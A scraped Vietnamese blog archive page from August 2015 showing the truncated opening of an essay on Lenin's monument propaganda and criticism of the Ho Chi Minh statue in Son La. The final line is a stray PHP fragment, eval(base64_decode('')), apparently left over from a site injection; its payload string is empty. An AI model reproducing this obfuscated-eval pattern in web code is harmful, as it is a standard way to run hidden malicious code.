Archive for August 13th, 2015

Lenin và chính sách “Tuyên truyền Tượng đài”

Lenin và chính sách “Tuyên truyền Tượng đài”

Trong thời gian qua, hầu hết bài viết dù phê bình việc dựng tượng đài Hồ Chí Minh ở Sơn La đều nhấn mạnh đến những yếu tố như tốn kém tiền bạc, nuôi sống tham nhũng, làm cho dân tình thêm đói khổ v.v.. Những phê bình đó không

08.13.2015 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>